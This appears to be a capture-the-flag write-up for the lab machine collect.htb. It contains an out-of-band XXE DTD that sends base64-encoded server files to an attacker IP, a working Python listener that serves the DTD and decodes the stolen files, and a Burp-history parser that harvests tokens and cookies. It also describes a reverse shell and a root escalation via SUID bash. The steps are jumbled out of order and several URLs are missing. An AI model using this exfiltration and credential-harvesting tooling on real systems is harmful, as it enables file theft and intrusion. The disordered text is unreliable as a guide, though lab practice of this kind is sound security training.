# Ports
Open 10.10.11.192:22
Open 10.10.11.192:80
Open 10.10.11.192:6379
# Services
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
6379/tcp open redis syn-ack ttl 63 Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80
Checking the website reveals the real hostname collect.htb (the server is a name-based virtual host, so requests by IP and by name may not land on the same site). We add it to /etc/hosts before any further enumeration.
Port 6379
Nothing interesting yet: the instance requires authentication, so every command is rejected with NOAUTH until we have the password. Worth coming back to once bootstrap.php has been read, since the credentials found there can be passed with redis-cli -a.
redis-cli -h collect.htb
collect.htb:6379> info
NOAUTH Authentication required.
(1.62s)
After some trial and error we are able to read local files through XXE with an out-of-band DTD. Do it for index.php first to get an overview, then for bootstrap.php, which index.php mentions: that file holds the redis password. The php://filter base64 wrapper matters here, since raw PHP source contains characters that would break the XML and the URL; decode the value on the receiving end. While poking around we also discovered /var/www/developers/.htpasswd.
xxe.dtd
<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=../bootstrap.php'>
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://10.10.16.28/?file=%file;'>">
%eval;
%exfiltrate;
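The receiving side of that exfiltration, as an added example that is not part of the original write-up: one small Python listener that both serves xxe.dtd (the DTD above, generated by build_dtd) and decodes whatever comes back in ?file=. It assumes the XML the target parses pulls the DTD in with the usual `<!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://10.10.16.28/xxe.dtd"> %xxe;]>` form, which the page does not show, and the attacker address and resource path are the page's own values.

```python
import base64
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_dtd(resource: str, callback: str) -> str:
    """Return the out-of-band DTD from the write-up: the first parameter entity
    reads `resource` through php://filter as base64, the second is declared at
    parse time (via %eval;) and points at our callback with the data in the
    query string."""
    return (
        f"<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource={resource}'>\n"
        f"<!ENTITY % eval \"<!ENTITY % exfiltrate SYSTEM '{callback}/?file=%file;'>\">\n"
        "%eval;\n"
        "%exfiltrate;\n"
    )


def decode_exfil(path: str):
    """Extract and base64-decode the ?file= value of a request path.
    Returns None when the request is not an exfiltration hit."""
    query = urllib.parse.urlsplit(path).query
    values = urllib.parse.parse_qs(query, keep_blank_values=True).get("file")
    if not values:
        return None
    # libxml puts the raw base64 in the URL, so any '+' arrives literally and
    # parse_qs turns it into a space; undo that before decoding.
    data = values[0].replace(" ", "+")
    data += "=" * (-len(data) % 4)  # tolerate padding lost in transit
    try:
        return base64.b64decode(data, validate=True)
    except ValueError:
        return None


class ExfilHandler(BaseHTTPRequestHandler):
    # Set once at startup; the victim fetches /xxe.dtd from us, then calls back.
    dtd = build_dtd("../bootstrap.php", "http://10.10.16.28")

    def do_GET(self):
        if self.path == "/xxe.dtd":
            body = self.dtd.encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        content = decode_exfil(self.path)
        if content is None:
            self.send_response(404)
            self.end_headers()
            return
        print(f"[+] {self.client_address[0]} sent {len(content)} bytes:")
        print(content.decode(errors="replace"))
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # keep stdout for the exfiltrated files only
        pass


def serve(host: str = "0.0.0.0", port: int = 80) -> None:
    HTTPServer((host, port), ExfilHandler).serve_forever()


if __name__ == "__main__":
    import sys
    serve(port=int(sys.argv[1]) if len(sys.argv) > 1 else 80)
```

Run it as root (or pick a high port and adjust the callback URL) on the attacker host; each successful fetch prints the decoded file, and non-matching requests are answered with 404 so stray probes do not clutter the output.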
php-fpm runs a dedicated worker pool as victor next to the root master process:
root 975 0.0 1.0 265400 40792 ? Ss Dec12 0:09 php-fpm: master process (/etc/php/8.1/fpm/php-fpm.conf)
victor 1115 0.0 0.5 265840 20640 ? S Dec12 0:00 php-fpm: pool victor
victor 1116 0.0 0.4 265840 19400 ? S Dec12 0:00 php-fpm: pool victor
Once we have a shell as victor we start to enumerate the box again.
Enumeration
It seems we can access the pollution_api source code from victor's home directory:
cd ~
ls
Desktop Documents Downloads Music Pictures Public Templates Videos pollution_api user.txt
cd pollution_api
ls
controllers functions index.js log.sh logs models node_modules package-lock.json package.json routes
Check for running processes related to the API:
ps aux | grep api
root 1347 0.0 1.9 1664540 76956 ? Sl Dec12 0:01 /usr/bin/node /root/pollution_api/index.js
The API is started by root from /root/pollution_api, so code execution inside it runs as root. The s bits in the listing below mean bash -p (which keeps the effective uid instead of dropping it) gives a root shell:
ls -al /usr/bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /usr/bin/bash
Root
We're now root and get the last flag in /root
The site seems to be a forum for members of collect.htb where they are able to ask questions and get help.
First let's register an account at
Victor (a dev) has trouble accessing the pollution api. The attachment contains environment info.
Kubernetes?
John is responsible for developers.collect.htb?
Once we downloaded the attachment of we discovered it's a Burp history file.
Register an account on and capture the requests in Burp.
Use the previously discovered token to elevate our privileges.
The parameter ?page is vulnerable to remote code execution using PHP filter chains. We will use this project to get a reverse shell on the system :)
We'll use this script to escalate our privileges to user "victor".
Open in your browser, register a new API user and capture the request.
While parsing through the source code we can spot a possible vulnerability:
/home/victor/pollution_api/controllers/Messages_send.js
But checking the code will tell us that we need admin permissions on the API.
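A Burp history attachment is the XML that Burp's "Save items" writes: every field is CDATA and the request/response bodies are base64 when marked base64="true". As an added example that is not part of the original write-up, here is a parser for that format that decodes the bodies and flags credential-looking strings, which is the fast way to find the token mentioned above in a large export. The sample export, the /api/login and /api/whoami paths and the EXAMPLE_TOKEN_VALUE and EXAMPLESESSION values are constructed for the example, not taken from the box, and only the item fields the parser uses are included.

```python
import base64
import re
import xml.etree.ElementTree as ET

# What we want out of saved traffic. Hypothetical and deliberately loose:
# header-carried credentials, token-like URL/body parameters, token-like JSON
# members. Tune per target.
HEADER_RE = re.compile(r"(?im)^(Authorization|Cookie):[ \t]*([^\r\n]+)")
PARAM_RE = re.compile(r"(?i)\b(token|api[_-]?key|session)=([^&\s;]+)")
JSON_RE = re.compile(r'(?i)"(token|api[_-]?key)"\s*:\s*"([^"]+)"')


def parse_burp_items(xml_text: str) -> list:
    """Parse a Burp 'Save items' export into dicts with decoded bodies."""
    root = ET.fromstring(xml_text)
    items = []
    for item in root.iter("item"):
        rec = {
            "url": item.findtext("url", default=""),
            "method": item.findtext("method", default=""),
            "status": item.findtext("status", default=""),
        }
        for tag in ("request", "response"):
            el = item.find(tag)
            text = (el.text or "").strip() if el is not None else ""
            if el is not None and el.get("base64") == "true":
                rec[tag] = base64.b64decode(text)
            else:
                rec[tag] = text.encode()
        items.append(rec)
    return items


def find_secrets(items: list) -> list:
    """Return (url, kind, value) triples for every credential-looking string
    in the decoded requests and responses, in export order."""
    hits = []
    for rec in items:
        for tag in ("request", "response"):
            text = rec[tag].decode("utf-8", errors="replace")
            hits += [(rec["url"], m.group(1), m.group(2).strip()) for m in HEADER_RE.finditer(text)]
            hits += [(rec["url"], m.group(1), m.group(2)) for m in PARAM_RE.finditer(text)]
            hits += [(rec["url"], m.group(1), m.group(2)) for m in JSON_RE.finditer(text)]
    return hits


def _item(url, method, status, request, response):
    """Build one <item> the way Burp writes it (CDATA text, base64 bodies)."""
    b64 = lambda s: base64.b64encode(s.encode()).decode()
    return (f"<item><url><![CDATA[{url}]]></url><method><![CDATA[{method}]]></method>"
            f"<request base64=\"true\"><![CDATA[{b64(request)}]]></request>"
            f"<status>{status}</status>"
            f"<response base64=\"true\"><![CDATA[{b64(response)}]]></response></item>")


# Constructed sample export: hostnames mirror the box, paths and values are made up.
SAMPLE_XML = (
    '<?xml version="1.0"?><items burpVersion="2022.12">'
    + _item("http://collect.htb/api/login", "POST", "200",
            "POST /api/login HTTP/1.1\r\nHost: collect.htb\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 24\r\n\r\n"
            "user=victor&pass=hunter2",
            "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n"
            "Set-Cookie: PHPSESSID=EXAMPLESESSION; path=/\r\n\r\n"
            '{"token":"EXAMPLE_TOKEN_VALUE"}')
    + _item("http://collect.htb/api/whoami?token=EXAMPLE_TOKEN_VALUE", "GET", "200",
            "GET /api/whoami?token=EXAMPLE_TOKEN_VALUE HTTP/1.1\r\nHost: collect.htb\r\n"
            "Cookie: PHPSESSID=EXAMPLESESSION\r\n\r\n",
            "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n"
            '{"user":"victor","role":"dev"}')
    + "</items>"
)


if __name__ == "__main__":
    import sys
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for url, kind, value in find_secrets(parse_burp_items(xml_text)):
        print(f"{kind:14} {value}  <- {url}")
```

Point it at the downloaded attachment (python3 burp_secrets.py history.xml) to list every header, parameter or JSON member that looks like a credential together with the request it came from; the regexes are the part to adjust when the target names its token differently.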